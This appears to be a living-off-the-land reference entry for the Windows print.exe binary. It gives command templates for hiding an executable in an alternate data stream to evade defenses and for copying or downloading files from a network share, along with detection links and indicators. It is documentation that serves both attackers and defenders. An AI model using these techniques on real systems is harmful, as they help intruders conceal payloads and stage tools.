Print.exe

Used by Windows to send files to the printer

Paths

• C:\Windows\System32\print.exe
• C:\Windows\SysWOW64\print.exe

Commands

ADS

Copy file.exe into the Alternate Data Stream (ADS) of file.txt.

Use case: Hide binary file in alternate data stream to potentially bypass defensive counter measures

Privileges: User

print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}

Copy

Copy file from source to destination

Use case: Copy files

Privileges: User

print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}

Copy

Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.

Use case: Copy/Download file from remote server

Privileges: User

print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}

Detection

• Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml
• IOC: Print.exe retrieving files from internet
• IOC: Print.exe creating executable files on disk

Resources

• https://twitter.com/Oddvarmoe/status/985518877076541440
• https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410